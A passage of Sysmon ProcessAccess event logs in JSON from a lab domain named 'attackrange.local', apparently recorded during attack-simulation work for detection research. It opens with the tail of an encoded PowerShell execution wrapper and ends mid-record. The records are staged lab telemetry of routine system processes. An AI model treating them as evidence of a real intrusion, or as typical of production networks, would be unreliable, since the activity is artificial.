JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5584,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-001081F10800}\r\nSourceProcessId: 3496\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-00108C3E0800}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66f32ed9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6639481a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f2ce9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d61df(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663c8164(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d4697(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d428a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663baae5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663ba0b5(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-001081F10800}","SourceProcessId":"3496","SourceThreadId":"3780","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-00108C3E0800}","TargetProcessId":"668","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66f32ed9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6639481a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f2ce9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d61df(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663c8164(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d4697(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d428a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663baae5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663ba0b5(wow64)","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5585,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-00108C3E0800}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-00108C3E0800}","TargetProcessId":"668","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5586,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5587,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5588,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5589,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5590,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 